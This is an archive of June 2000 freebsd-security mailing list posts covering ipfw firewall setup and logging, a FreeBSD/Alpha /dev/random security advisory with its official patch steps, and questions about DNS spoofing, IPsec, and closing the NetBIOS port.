From owner-freebsd-security Sun Jun 11 10:23:22 2000
From: Cy Schubert - ITSD Open Systems Group
Reply-To: Cy Schubert - ITSD Open Systems Group
To: Greg Hormann
Cc: security@FreeBSD.ORG
Subject: Re: Setting up simple firewall with ipfw
Date: Sun, 11 Jun 2000 10:21:07 -0700
Message-Id: <200006111721.e5BHLiX06847@cwsys.cwsent.com>
In-reply-to: Your message of "Sat, 10 Jun 2000 13:37:50 EDT."

In message , Greg Hormann writes:
>
> I'm trying to set up a simple little firewall for my stand-alone FreeBSD-4.0
> box. Most of what I want seems to be working, but I'm having a few
> problems I would appreciate some help with. (I'm *extremely* new to
> firewalls.)
>
> 1) This box obtains its internet address via dhcp. Because of that, I've
> been using "any to any via ed0". This box is dual homed, and at some
> point in time I'd like to use natd to make this box a gateway for my
> internal network. Is there a more secure way to set things up when using
> dhcp?

You can modify dhclient-script to alter your firewall whenever you get a
new IP address via DHCP.

> 2) I can't get logging working to help me troubleshoot my problems.
> (IPFIREWALL_VERBOSE is in the kernel.) -- It may work, and I don't know
> where to look for it. It doesn't appear on the console, and after looking
> at the man page, I still couldn't figure it out.
>
> sysctl net.inet.ip.fw returns:
>
> net.inet.ip.fw.enable: 1
> net.inet.ip.fw.one_pass: 1
> net.inet.ip.fw.debug: 1
> net.inet.ip.fw.verbose: 1
> net.inet.ip.fw.verbose_limit: 0
> net.inet.ip.fw.dyn_buckets: 256
> net.inet.ip.fw.curr_dyn_buckets: 256
> net.inet.ip.fw.dyn_count: 0
> net.inet.ip.fw.dyn_max: 1000
> net.inet.ip.fw.dyn_ack_lifetime: 300
> net.inet.ip.fw.dyn_syn_lifetime: 20
> net.inet.ip.fw.dyn_fin_lifetime: 20
> net.inet.ip.fw.dyn_rst_lifetime: 5
> net.inet.ip.fw.dyn_short_lifetime: 5
>
> 3) I'm having trouble getting ftp/ssh traffic through my firewall. (I can
> get out, but not in.) When trying to ftp or ssh in, I receive "TCP/IP
> Failure"
>
> I currently have the following rules: (Remember, I'm using dhcp, hence so
> many "any to any")
>
> 00100 108 7771 allow tcp from any to any via ed0 established
> 00100 114 15516 allow ip from any to any via lo0
> 00200 1 44 allow tcp from any to any 25 via ed0
> 00200 0 0 deny ip from any to 127.0.0.0/8
> 00300 0 0 allow tcp from any to any 23 via ed0
> 00400 0 0 allow tcp from any to any 22 setup
> 00500 0 0 allow udp from any to any 22
> 00600 0 0 allow tcp from any 22 to any
> 00700 0 0 allow tcp from any to any 20 via ed0
> 00800 0 0 allow tcp from any to any 21 via ed0
> 00900 0 0 allow tcp from any to any 80 via ed0
> 01000 0 0 allow tcp from any to any 220 via ed0
> 01100 0 0 allow tcp from any to any 546
> 01200 0 0 allow udp from any to any 56
> 01300 4 176 allow tcp from any to any 110
> 01400 5 220 deny log tcp from any to any 1-1024 via ed0
> 65000 14 1701 allow ip from any to any
> 65535 6 672 deny ip from any to any

I'm not sure what you're trying to accomplish here -- the 22/udp is
confusing, unless you want to allow PC Anywhere through.

The FTP protocol is an abortion. You have a choice of passive or PORT
FTP. Depending on the direction you will require opening up your
firewall to the world or the world's firewalls need to be opened up to
FTP to you. In my IPFW and ipchains firewalls I specify that my users
behind those firewalls must use passive FTP as clients to get out. As
FTP servers are a security risk I usually put them on a DMZ or exterior
network.

A packet filter with an FTP application proxy might let you have the
best of both worlds. It just happens that IP Filter comes with FreeBSD
as well. Even then, running a world-accessible FTP server behind your
firewall, IMO, is still a big risk, unless you're offering services to
customers behind your firewall who themselves are also behind another
firewall, an onion ring approach of firewalls within firewalls within
firewalls where outside rings have no access to or a very limited
access to a set of services on the inside.


Regards,                       Phone:  (250)387-8437
Cy Schubert                      Fax:  (250)387-5766
Team Leader, Sun/DEC Team   Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security Mon Jun 12 3:26:41 2000
From: Greg Hormann
To: Cy Schubert - ITSD Open Systems Group
Cc: security@FreeBSD.ORG
Subject: Re: Setting up simple firewall with ipfw
Date: Mon, 12 Jun 2000 06:29:21 -0400 (EDT)
In-Reply-To: <200006111721.e5BHLiX06847@cwsys.cwsent.com>

Thanks. The FTP port was just to see if I could get it to work. Once I
got it working, I shut it down.

Greg.

>
> I'm not sure what you're trying to accomplish here -- the 22/udp is
> confusing, unless you want to allow PC Anywhere through.
>
> The FTP protocol is an abortion. You have a choice of passive or PORT
> FTP. Depending on the direction you will require opening up your
> firewall to the world or the world's firewalls need to be opened up to
> FTP to you. In my IPFW and ipchains firewalls I specify that my users
> behind those firewalls must use passive FTP as clients to get out. As
> FTP servers are a security risk I usually put them on a DMZ or exterior
> network.
>
> A packet filter with an FTP application proxy might let you have the
> best of both worlds. It just happens that IP Filter comes with FreeBSD
> as well. Even then, running a world-accessible FTP server behind your
> firewall, IMO, is still a big risk, unless you're offering services to
> customers behind your firewall who themselves are also behind another
> firewall, an onion ring approach of firewalls within firewalls within
> firewalls where outside rings have no access to or a very limited
> access to a set of services on the inside.
>
>
> Regards,                       Phone:  (250)387-8437
> Cy Schubert                      Fax:  (250)387-5766
> Team Leader, Sun/DEC Team   Internet:  Cy.Schubert@osg.gov.bc.ca
> Open Systems Group, ITSD, ISTA
> Province of BC


From owner-freebsd-security Mon Jun 12 5:42:04 2000
From: Alex Koshterek
To: freebsd-security@freebsd.org
Subject: cvsup
Date: Mon, 12 Jun 2000 15:41:51 +0300
Message-ID: <3944DA8F.4491CB6A@lookanswer.com>
When I try to upgrade my system via cvsup (host: anoncvs.freebsd.org),
I see:

Connecting to anoncvs.FreeBSD.org
Cannot connect to anoncvs.FreeBSD.org: Connection refused
Will retry at ...

Why?


From owner-freebsd-security Mon Jun 12 8:36:52 2000
From: Adam Laurie
Organization: A.L. Group plc
To: Alex Koshterek
Cc: freebsd-security@freebsd.org
Subject: Re: cvsup
Date: Mon, 12 Jun 2000 16:35:39 +0100
Message-ID: <3945034B.90C4C6C0@algroup.co.uk>
References: <3944DA8F.4491CB6A@lookanswer.com>

Alex Koshterek wrote:
>
> When I try to upgrade my system via cvsup (host: anoncvs.freebsd.org),
> I see:
>
> Connecting to anoncvs.FreeBSD.org
> Cannot connect to anoncvs.FreeBSD.org: Connection refused
> Will retry at ...
>
> Why?

and your security related question is...?

cheers,
Adam
--
Adam Laurie                   Tel: +44 (181) 742 0755
A.L. Digital Ltd.             Fax: +44 (181) 742 5995
Voysey House
Barley Mow Passage            http://www.aldigital.co.uk
London W4 4GB                 mailto:adam@algroup.co.uk
UNITED KINGDOM                PGP key on keyservers


From owner-freebsd-security Mon Jun 12 8:55:55 2000
From: Wes Peters
Organization: Softweyr LLC
To: Alex Koshterek
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: cvsup
Date: Mon, 12 Jun 2000 09:55:43 -0600
Message-ID: <394507FF.9C1F781D@softweyr.com>
References: <3944DA8F.4491CB6A@lookanswer.com>

Alex Koshterek wrote:
>
> When I try to upgrade my system via cvsup (host: anoncvs.freebsd.org),
> I see:
>
> Connecting to anoncvs.FreeBSD.org
> Cannot connect to anoncvs.FreeBSD.org: Connection refused
> Will retry at ...
>
> Why?

Perhaps because anoncvs.freebsd.org isn't a CVSup server? See section
A.4.7 of the Handbook, CVSup Sites, at
http://www.freebsd.org/handbook/mirrors-cvsup.html for help on choosing
a CVSup server near you.

--
"Where am I, and what am I doing in this handbasket?"
Wes Peters                                                Softweyr LLC
wes@softweyr.com                                      http://softweyr.com/


From owner-freebsd-security Mon Jun 12 12:14:34 2000
From: Marius Bendiksen
To: security@freebsd.org
Cc: mbendiks@eunet.no
Subject: msdosfs_vnops.c : msdosfs_rename()
Date: Mon, 12 Jun 2000 21:14:22 +0200 (CEST)

It would appear to me that, in the following section, there is the
potential for a malicious user to cause a system panic. Could anyone
confirm/disaffirm this?

	if (fvp == NULL) {
		/*
		 * From name has disappeared
		 */
		if (doingdirectory)
			panic("rename: lost dir entry");

This is after rescanning the directory during a rename operation. Neither
the directory, nor the entry, is locked at this point, according to the
comments in the source.

---
Marius Bendiksen


From owner-freebsd-security Mon Jun 12 13:09:02 2000
From: Bruce Evans
To: Marius Bendiksen
Cc: security@FreeBSD.ORG
Subject: Re: msdosfs_vnops.c : msdosfs_rename()
Date: Tue, 13 Jun 2000 06:08:42 +1000 (EST)

On Mon, 12 Jun 2000, Marius Bendiksen wrote:

> It would appear to me that, in the following section, there is the
> potential for a malicious user to cause a system panic. Could anyone
> confirm/disaffirm this?
>
> 	if (fvp == NULL) {
> 		/*
> 		 * From name has disappeared
> 		 */
> 		if (doingdirectory)
> 			panic("rename: lost dir entry");

No, this can only happen if there is a filesystem bug.

> This is after rescanning the directory during a rename operation. Neither
> the directory, nor the entry, is locked at this point, according to the
> comments in the source.

It is supposed to be locked by setting IN_RENAME in ip->i_flag. Note that
IN_RENAME is only set in the doingdirectory case.

I don't completely trust relookup(), however. In theory, the filesystem
tree may be almost arbitrarily rearranged while relookup() sleeps, since
relookup() doesn't hold many locks (in particular, it doesn't hold locks
on the directories being changed or their parents or grandparents until
it searches back down to them).
I once made this happen in practice by forcing some long sleeps and
doing the rearrangement in another process. There seemed to be problems,
but I wasn't sure and have forgotten the details.

Bruce


From owner-freebsd-security Mon Jun 12 14:51:56 2000
From: FreeBSD Security Advisories
Reply-To: security-advisories@freebsd.org
Subject: FreeBSD Security Advisory: FreeBSD-SA-00:25.alpha-dev-random
Date: Mon, 12 Jun 2000 14:51:44 -0700 (PDT)
Message-Id: <20000612215144.D1A3B37BBF7@hub.freebsd.org>

=============================================================================
FreeBSD-SA-00:25                                           Security Advisory
                                                                FreeBSD, Inc.

Topic:          FreeBSD/Alpha platform lacks kernel pseudo-random number
                generator, some applications fail to detect this.

Category:       core
Module:         kernel
Announced:      2000-06-12
Affects:        FreeBSD/Alpha prior to the correction date.
Corrected:      2000-05-10 (4.0-STABLE)
                2000-04-28 (5.0-CURRENT)
FreeBSD only:   Yes

I.   Background

The FreeBSD kernel provides a cryptographic-strength pseudo-random number
generator via the /dev/random and /dev/urandom interfaces, which samples
hardware measurements to provide a high-quality source of "entropy"
(randomness).

II.  Problem Description

The FreeBSD port to the Alpha platform did not provide the /dev/random or
/dev/urandom devices - this was an oversight during the development
process which was not corrected before the Alpha port "became
mainstream". FreeBSD/i386 is not affected.

As a consequence, there is no way for Alpha systems prior to the
correction date to obtain cryptographic-strength random numbers, unless
an application "rolls its own" entropy gathering mechanism. This in
itself is not a vulnerability, although it is an omission and a
departure from the expected behaviour of a FreeBSD system.

The actual vulnerability is that some applications fail to correctly
check for a working /dev/random and do not exit with an error if it is
not available, so this weakness goes undetected. OpenSSL 0.9.4, and
utilities based on it, including OpenSSH (both of which are included in
the base FreeBSD 4.0 system) are affected in this manner (this bug was
corrected in OpenSSL 0.9.5).

Therefore, cryptographic security systems on vulnerable FreeBSD/Alpha
systems (including OpenSSH in the base FreeBSD 4.0 system) may have
weakened strength, and cryptographic keys generated on such systems
should not be trusted.

III. Impact

Cryptographic secrets (such as OpenSSH public/private keys) generated on
FreeBSD/Alpha systems may be much weaker than their "advertised"
strength, and may lead to data compromise to a dedicated and
knowledgeable attacker.

PGP/GnuPG keys, and keys generated by the SSH or SSH2 ports, are not
believed to be weakened since that software will correctly detect the
lack of a working /dev/random and use alternative sources of entropy.
OpenSSH and OpenSSL are currently the only known vulnerable applications.

IV.  Workaround

None available.

V.   Solution

One of the following three options, followed by step 2).

1a) Upgrade your FreeBSD/Alpha system to FreeBSD 4.0-STABLE after the
correction date.

1b) install the patched 4.0-RELEASE GENERIC kernel available from:

ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:25/kernel.gz

e.g. perform the following steps as root:

# fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:25/kernel.gz
# fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:25/kernel.gz.asc

[ Verify the detached PGP signature using your PGP utility - consult your
utility's documentation for how to do this ]

# gunzip kernel.gz
# cp /kernel /kernel.old
# chflags noschg /kernel
# cp kernel /kernel
# chflags schg /kernel

1c) Download the kernel source patch and rebuild your FreeBSD/Alpha
kernel, as follows:

# fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:25/kernel.sys.diff

Download the detached PGP signature:

# fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:25/kernel.sys.diff.asc

and verify the signature using your PGP utility.

Apply the patch:

# cd /usr/src
# patch -p < /path/to/kernel.sys.diff

Rebuild your kernel as described in
http://www.freebsd.org/handbook/kernelconfig.html and reboot with the
new kernel.

NOTE: Because of the significant improvements to the FreeBSD/Alpha
platform in FreeBSD 4.0, it is not planned at this time to backport the
necessary changes to FreeBSD 3.4-STABLE.

2) Immediately regenerate all OpenSSH-generated SSH keys and
OpenSSL-generated SSL certificates, and any other data relying on
cryptographic random numbers which were generated on FreeBSD/Alpha
systems, whose strength cannot be verified.

[Note: for most systems, the only significant vulnerability is likely to
be from OpenSSH and OpenSSL-generated keys and certificates (e.g. for
SSL webservers)]


From owner-freebsd-security Mon Jun 12 18:42:49 2000
From: Hugh Ho
To: freebsd-security@freebsd.org
Subject: IPFW rules for DNS?
Date: Mon, 12 Jun 2000 18:42:37 -0700 (PDT)
Message-ID: <20000613014237.10942.qmail@web210.mail.yahoo.com>

I need to do nslookup quite often, and I have the following IPFW rules
which allow nslookup to talk to my ISP's DNS server:

    allow udp from ${my_ip} to ${dns_server} 53
    allow udp from ${dns_server} 53 to ${my_ip}

Problem with the above rules is that people can pass IPFW if they use
UDP port 53 with a spoofed IP that matches my ISP's DNS server. Is there
a way to fix my problem?

Thanks.

-Hugh
From owner-freebsd-security Mon Jun 12 18:46:28 2000
From: Mike Tancsa
To: Hugh Ho , freebsd-security@FreeBSD.ORG
Subject: Re: IPFW rules for DNS?
Date: Mon, 12 Jun 2000 21:42:05 -0400
Message-Id: <4.2.2.20000612213940.036c4ec0@mail.sentex.net>
In-Reply-To: <20000613014237.10942.qmail@web210.mail.yahoo.com>

At 06:42 PM 6/12/2000 -0700, Hugh Ho wrote:
>I need to do nslookup quite often, and I have the following IPFW rules which
>allow nslookup to talk to my ISP's DNS server:
>
>    allow udp from ${my_ip} to ${dns_server} 53
>    allow udp from ${dns_server} 53 to ${my_ip}
>
>Problem with the above rules is that people can pass IPFW if they use UDP port
>53 with a spoofed IP that matches my ISP's DNS server. Is there a way to
>fix my
>problem?

Sadly no. However, your ISP should be at least blocking spoofed addresses
from the outside world from coming in to their network. But that does not
of course prevent other users from inside from doing so. Make sure bind
is running in its own sandbox in case you are not doing so already.

---Mike
--------------------------------------------------------------------
Mike Tancsa,                                      tel +1 519 651 3400
Network Administration,                           mike@sentex.net
Sentex Communications                             www.sentex.net
Cambridge, Ontario Canada                         www.sentex.net/mike


From owner-freebsd-security Tue Jun 13 1:33:43 2000
From: Terje Elde
To: "Alex N. Markelov"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: PGPnet
Date: Tue, 13 Jun 2000 10:33:30 +0200
Message-ID: <20000613103330.I3675@dlt.follo.net>
References: <393E1EF4.91EF9861@futures.msk.ru>
In-Reply-To: <393E1EF4.91EF9861@futures.msk.ru>; from amarkelov@futures.msk.ru on Wed, Jun 07, 2000 at 02:07:48PM +0400

* Alex N. Markelov (amarkelov@futures.msk.ru) [000607 20:04]:
> I have installed the last international version of PGP 6.5.1i and want to
> discover whether we have any package under FreeBSD to work with other
> computers securing communication with PGPnet. In 'what's new' of the
> version of PGP I see it works with Cisco routers (IOS 12.0(4) and later
> with IPsec TripleDES) and Linux FreeS/WAN. Do we have anything to work
> with?

Didn't see any replies on the list, so although a bit late, here I am.
There is a chance you'll be able to get this up and running with static
keying, but PGPNet seems awfully connection aware and wants to chat with
the IKE daemon running on the server before doing any secure work.

The IKE daemon that goes together with KAME (the IPsec stack FreeBSD is
using) is called racoon, and has not been integrated into the base
system yet. Several people are working on this though, but most of them
seem to be pretty preoccupied, so I would not hold your breath if I were
you.

Terje


From owner-freebsd-security Tue Jun 13 2:44:08 2000
From: Ilia Kuliev
To: "'security@freebsd.org'"
Subject:
Date: Tue, 13 Jun 2000 11:43:58 +0200
Message-ID: <414CE1396547D211945F00A0C99CF5004B57D9@mail.aist.com>

list


From owner-freebsd-security Tue Jun 13 4:18:07 2000
From: Greg Hormann
To: Scott Campbell
Cc: security@freebsd.org
Subject: Re: Setting up simple firewall with ipfw
Date: Tue, 13 Jun 2000 07:20:41 -0400 (EDT)

I'm an idiot. I screwed up /etc/syslogd.conf. Once I fixed that things
started working fine.

Thanks.

Greg.

On Mon, 12 Jun 2000, Scott Campbell wrote:

> On Sat, 10 Jun 2000, Greg Hormann wrote:
>
> > 2) I can't get logging working to help me troubleshoot my problems.
> > (IPFIREWALL_VERBOSE is in the kernel.) -- It may work, and I don't know
> > where to look for it. It doesn't appear on the console, and after looking
> > at the man page, I still couldn't figure it out.
> > > > sysctl net.inet.ip.fw returns: > > > > net.inet.ip.fw.enable: 1 > > net.inet.ip.fw.one_pass: 1 > > net.inet.ip.fw.debug: 1 > > net.inet.ip.fw.verbose: 1 > > net.inet.ip.fw.verbose_limit: 0 *********Probably the problem***** > > net.inet.ip.fw.dyn_buckets: 256 > > net.inet.ip.fw.curr_dyn_buckets: 256 > > net.inet.ip.fw.dyn_count: 0 > > net.inet.ip.fw.dyn_max: 1000 > > net.inet.ip.fw.dyn_ack_lifetime: 300 > > net.inet.ip.fw.dyn_syn_lifetime: 20 > > net.inet.ip.fw.dyn_fin_lifetime: 20 > > net.inet.ip.fw.dyn_rst_lifetime: 5 > > net.inet.ip.fw.dyn_short_lifetime: 5 > > > > > It sounds like your other problems are being delt with by the group but I > thought I would let you know about logging. > > In the kernel setup do you have a > > option IPFIREWALL_VERBOSE_LIMIT=??? > > line? I use 500 just so I don't get flooded when I turn it on. It (ipfw > man pg/LINT) doesn't say you _need_ it but I like to use it. The default > on the limit is 0 if you don't give it a value. I am not sure if you can > set this to log forever but I am sure you could work out a system of > turning your logs each night and reseting the counters if you were so > inclined. > > In syslog.conf you need something like > > !ipfw > *.* /var/log/ipfw.log > > then you need to touch /var/log/ipfw.log so that it exists. It won't be > able to write to the log if the file isn't there. > > You then need to write the rule you want to log with the 'log' command. > > ie > > ipfw add 1400 deny log tcp from any to any 1-1024 via ed0 > > which it looks like you already do. > > > Short answer: > Change your limit and ensure you have the log file set up correctly. Let > me know if you still can't get it logging and I'll try to help. > > > Scott E. 
> Campbell
> _______________________________
> Computer Operations
> Greater Victoria Public Library
> Victoria BC CANADA
>
> (250)382-7241 x230
> scampbel@gvpl.victoria.bc.ca

From owner-freebsd-security Tue Jun 13 05:22:21 2000
From: Valentin Nechayev
Reply-To: netch@lucky.net
Date: Tue, 13 Jun 2000 15:22:11 +0300
To: freebsd-security@freebsd.org
Subject: O_NOFOLLOW
Message-ID: <20000613152211.B42067@lucky.net>

The O_NOFOLLOW flag for the open() syscall has existed since 3.0-CURRENT and
is quite useful for secure open, but it is not documented in the open(2) man
page yet. Does the FreeBSD team have plans to document it?
--
NVA

From owner-freebsd-security Tue Jun 13 06:00:55 2000
From: George.Giles@mcmail.vanderbilt.edu
Date: Tue, 13 Jun 2000 07:58:30 -0500
To: freebsd-security@freebsd.org
Subject: netbios
Message-ID: <862568FD.0046A112.00@MCSMTP.MC.VANDERBILT.EDU>

I have closed all ports except 21, 22 using ipfw. On scanning, I find port 139
open, called NETBIOS. How do I close it?
Please advise,

George

From owner-freebsd-security Tue Jun 13 07:06:22 2000
From: Harald Haugnes
Date: Tue, 13 Jun 2000 16:07:20 +0200
To: "'George.Giles@mcmail.vanderbilt.edu'", freebsd-security@freebsd.org
Subject: RE: netbios

What if you looked in your inetd.conf? You should be able to disable it from
there.

-----------------------------------------------------
Sincerely,
Harald Haugnes
-----------------------------------------------------
Kvalito IT AS          Tlf: 73 54 64 80
Pb. 1238               Fax: 73 54 64 76
7462 Trondheim
http://www.kvalito.no/
Konto nr 8601.05.43942
-----------------------------------------------------
Hi! I'm a .signature virus!
cp me into your .signature file to help me spread!
-----------------------------------------------------

> -----Original Message-----
> From: George.Giles@mcmail.vanderbilt.edu
> [mailto:George.Giles@mcmail.vanderbilt.edu]
> Sent: 13 June 2000 14:59
> To: freebsd-security@freebsd.org
> Subject: netbios
>
> I have closed all ports except 21, 22 using ipfw. I find on
> scanning a port 139
> open called NETBIOS. How do I close?
>
> Please advise,
>
> George

From owner-freebsd-security Tue Jun 13 09:49:13 2000
From: Lawrence Sica
Organization: Interactivate, Inc
Date: Tue, 13 Jun 2000 09:54:09 -0700
To: George.Giles@mcmail.vanderbilt.edu
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: netbios
Message-ID: <39466731.3C2890C@interactivate.com>
References: <862568FD.0046A112.00@MCSMTP.MC.VANDERBILT.EDU>

George.Giles@mcmail.vanderbilt.edu wrote:
>
> I have closed all ports except 21, 22 using ipfw. I find on scanning a port 139
> open called NETBIOS. How do I close?
>
> Please advise,
>

Well, if you closed the others then do it the same way. You'll want to close
ports 137-139, though:

    ipfw add deny tcp from any to any 137-139

That is a quick, simple way to do it. You should also man ipfw for all the
information on ipfw, though.

Are there Windows machines connecting to that box? If so it is most likely
that; otherwise it may be someone looking for Windows boxes.
--Larry

From owner-freebsd-security Tue Jun 13 10:40:39 2000
From: Matt Watson
Date: Tue, 13 Jun 2000 12:33:56 -0500 (CDT)
To: Harald Haugnes
Cc: "'George.Giles@mcmail.vanderbilt.edu'", freebsd-security@FreeBSD.ORG
Subject: RE: netbios

NetBIOS should only be open if you're running Samba. In case you don't know,
NetBIOS is a part of Windows' (at least it's mostly used with Windows)
network communication protocol for file sharing and printer sharing etc. You
should be able to see the daemons running as 'nmbd' and 'smbd'; you'll want
to kill both of them. However, it's obviously being started at boot time in
your case. I'm not sure where FreeBSD would keep the startup for Samba,
probably /etc/rc.conf or /etc/rc.local. If you don't find Samba running I
don't know what else it would be... I've never seen anything but Samba use
it. You could find out using 'sockstat'.

--
Matt Watson
TeraHertz Communications

On Tue, 13 Jun 2000, Harald Haugnes wrote:

> What if you looked in your inetd.conf?
> You should be able to disable it from there.
>
> -----------------------------------------------------
> Sincerely,
> Harald Haugnes
> -----------------------------------------------------
> Kvalito IT AS          Tlf: 73 54 64 80
> Pb.
> 1238               Fax: 73 54 64 76
> 7462 Trondheim
>
> http://www.kvalito.no/
> Konto nr 8601.05.43942
> -----------------------------------------------------
> Hi! I'm a .signature virus!
> cp me into your .signature file to help me spread!
> -----------------------------------------------------
>
> > -----Original Message-----
> > From: George.Giles@mcmail.vanderbilt.edu
> > [mailto:George.Giles@mcmail.vanderbilt.edu]
> > Sent: 13 June 2000 14:59
> > To: freebsd-security@freebsd.org
> > Subject: netbios
> >
> > I have closed all ports except 21, 22 using ipfw. I find on
> > scanning a port 139
> > open called NETBIOS. How do I close?
> >
> > Please advise,
> >
> > George

From owner-freebsd-security Tue Jun 13 10:46:35 2000
From: Szilveszter Adam
Date: Tue, 13 Jun 2000 19:46:12 +0200
To: freebsd-security@FreeBSD.ORG
Subject: Re: netbios
Message-ID: <20000613194612.B16541@petra.hos.u-szeged.hu>
In-Reply-To: ; from
sideshow@terahertz.net on Tue, Jun 13, 2000 at 12:33:56PM -0500

On Tue, Jun 13, 2000 at 12:33:56PM -0500, Matt Watson wrote:
> NetBIOS should only be open if you're running Samba. In case you don't know,
> NetBIOS is a part of Windows' (at least it's mostly used with
> Windows) network communication protocol for file sharing and printer
> sharing etc. You should be able to see the daemons running as 'nmbd' and
> 'smbd'; you'll want to kill both of them. However, it's obviously being
> started at boot time in your case. I'm not sure where FreeBSD would keep
> the startup for Samba, probably /etc/rc.conf or /etc/rc.local. If you
> don't find Samba running I don't know what else it would be... I've never
> seen anything but Samba use it. You could find out using 'sockstat'.

Startup scripts for programs installed from ports (and Samba is such a
program) can be found in /usr/local/etc/rc.d/ and are named like .sh. You
want to delete or rename it so that it does not run at startup.
--
Regards:

Szilveszter ADAM
Szeged University
Szeged Hungary

From owner-freebsd-security Tue Jun 13 10:54:56 2000
From: "Philip M. Gollucci"
Date: Tue, 13 Jun 2000 13:54:45 -0400 (EDT)
To: George.Giles@mcmail.vanderbilt.edu
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: netbios
In-Reply-To: <862568FD.0046A112.00@MCSMTP.MC.VANDERBILT.EDU>

Check your inetd.conf file... If you're running Samba it should be open,
otherwise no.

On Tue, 13 Jun 2000 George.Giles@mcmail.vanderbilt.edu wrote:

> I have closed all ports except 21, 22 using ipfw. I find on scanning a port 139
> open called NETBIOS. How do I close?
>
> Please advise,
>
> George

From owner-freebsd-security Tue Jun 13 10:57:43 2000
From: Matt Watson
Date: Tue, 13 Jun 2000 12:51:06 -0500 (CDT)
To: Szilveszter Adam
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: netbios
In-Reply-To: <20000613194612.B16541@petra.hos.u-szeged.hu>

Ah, now I know for next time =)

--
Matt Watson
TeraHertz Communications

On Tue, 13 Jun 2000, Szilveszter Adam wrote:

> On Tue, Jun 13, 2000 at 12:33:56PM -0500, Matt Watson wrote:
> > NetBIOS should only be open if you're running Samba. In case you don't know,
> > NetBIOS is a part of Windows' (at least it's mostly used with
> > Windows) network communication protocol for file sharing and printer
> > sharing etc. You should be able to see the daemons running as 'nmbd' and
> > 'smbd'; you'll want to kill both of them. However, it's obviously being
> > started at boot time in your case. I'm not sure where FreeBSD would keep
> > the startup for Samba, probably /etc/rc.conf or /etc/rc.local. If you
> > don't find Samba running I don't know what else it would be... I've never
> > seen anything but Samba use it. You could find out using 'sockstat'.
>
> Startup scripts for programs installed from ports (and Samba is such a
> program) can be found in /usr/local/etc/rc.d/ and are named like
> .sh. You want to delete or rename it so that it does not run at startup.
>
> --
> Regards:
>
> Szilveszter ADAM
> Szeged University
> Szeged Hungary

From owner-freebsd-security Tue Jun 13 10:59:13 2000
From: Kameron Gasso
Date: Tue, 13 Jun 2000 10:58:47 -0700 (PDT)
To: Szilveszter Adam
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: netbios
In-Reply-To: <20000613194612.B16541@petra.hos.u-szeged.hu>

On Tue, 13 Jun 2000, Szilveszter Adam wrote:

> On Tue, Jun 13, 2000 at 12:33:56PM -0500, Matt Watson wrote:
> > NetBIOS should only be open if you're running Samba. In case you don't know,
> > NetBIOS is a part of Windows' (at least it's mostly used with
> > Windows) network communication protocol for file sharing and printer
> > sharing etc. You should be able to see the daemons running as 'nmbd' and
> > 'smbd'; you'll want to kill both of them.
> > However, it's obviously being
> > started at boot time in your case. I'm not sure where FreeBSD would keep
> > the startup for Samba, probably /etc/rc.conf or /etc/rc.local. If you
> > don't find Samba running I don't know what else it would be... I've never
> > seen anything but Samba use it. You could find out using 'sockstat'.
>
> Startup scripts for programs installed from ports (and Samba is such a
> program) can be found in /usr/local/etc/rc.d/ and are named like
> .sh. You want to delete or rename it so that it does not run at startup.

smbd/nmbd have their own inetd.conf entries in 4.0-RELEASE:

    wibbly# grep "mbd" *
    inetd.conf:#netbios-ssn stream  tcp     nowait  root    /usr/local/sbin/smbd    smbd
    inetd.conf:#netbios-ns  dgram   udp     wait    root    /usr/local/sbin/nmbd    nmbd

I also see nothing else regarding the two in /etc, /etc/defaults, or the
like.

Checking on my 3.4-RELEASE box, results are the same.

Cheers,

-Kameron
(kgasso@blort.org)

From owner-freebsd-security Tue Jun 13 11:13:18 2000
From: Matt Watson
Date: Tue, 13 Jun 2000 13:06:41 -0500 (CDT)
To: Kameron Gasso
Cc: Szilveszter Adam, freebsd-security@FreeBSD.ORG
Subject: Re: netbios

Kameron, actually see if they are already running in the background; nmbd
and smbd generally run as daemons and not from inetd.conf.
--
Matt Watson
TeraHertz Communications

On Tue, 13 Jun 2000, Kameron Gasso wrote:

> On Tue, 13 Jun 2000, Szilveszter Adam wrote:
> > On Tue, Jun 13, 2000 at 12:33:56PM -0500, Matt Watson wrote:
> > > NetBIOS should only be open if you're running Samba. In case you don't know,
> > > NetBIOS is a part of Windows' (at least it's mostly used with
> > > Windows) network communication protocol for file sharing and printer
> > > sharing etc. You should be able to see the daemons running as 'nmbd' and
> > > 'smbd'; you'll want to kill both of them. However, it's obviously being
> > > started at boot time in your case. I'm not sure where FreeBSD would keep
> > > the startup for Samba, probably /etc/rc.conf or /etc/rc.local. If you
> > > don't find Samba running I don't know what else it would be... I've never
> > > seen anything but Samba use it. You could find out using 'sockstat'.
> >
> > Startup scripts for programs installed from ports (and Samba is such a
> > program) can be found in /usr/local/etc/rc.d/ and are named like
> > .sh. You want to delete or rename it so that it does not run at startup.
>
> smbd/nmbd have their own inetd.conf entries in 4.0-RELEASE:
>
>     wibbly# grep "mbd" *
>     inetd.conf:#netbios-ssn stream  tcp     nowait  root    /usr/local/sbin/smbd    smbd
>     inetd.conf:#netbios-ns  dgram   udp     wait    root    /usr/local/sbin/nmbd    nmbd
>
> I also see nothing else regarding the two in /etc, /etc/defaults, or the
> like.
>
> Checking on my 3.4-RELEASE box, results are the same.
>
> Cheers,
>
> -Kameron
> (kgasso@blort.org)

From owner-freebsd-security Tue Jun 13 11:19:10 2000
From: Kameron Gasso
Date: Tue, 13 Jun 2000 11:18:48 -0700 (PDT)
To: Matt Watson
Cc: Szilveszter Adam, freebsd-security@FreeBSD.ORG
Subject: Re: netbios

On Tue, 13 Jun 2000, Matt Watson wrote:

> Kameron, actually see if they are already running in the background; nmbd
> and smbd generally run as daemons and not from inetd.conf.

Nope, neither running in bg. Suppose it would vary per version of Samba;
I recall that when I played with Redhat Linux (blah), it does start
smbd/nmbd in daemon mode and other versions I've used start both from inetd.
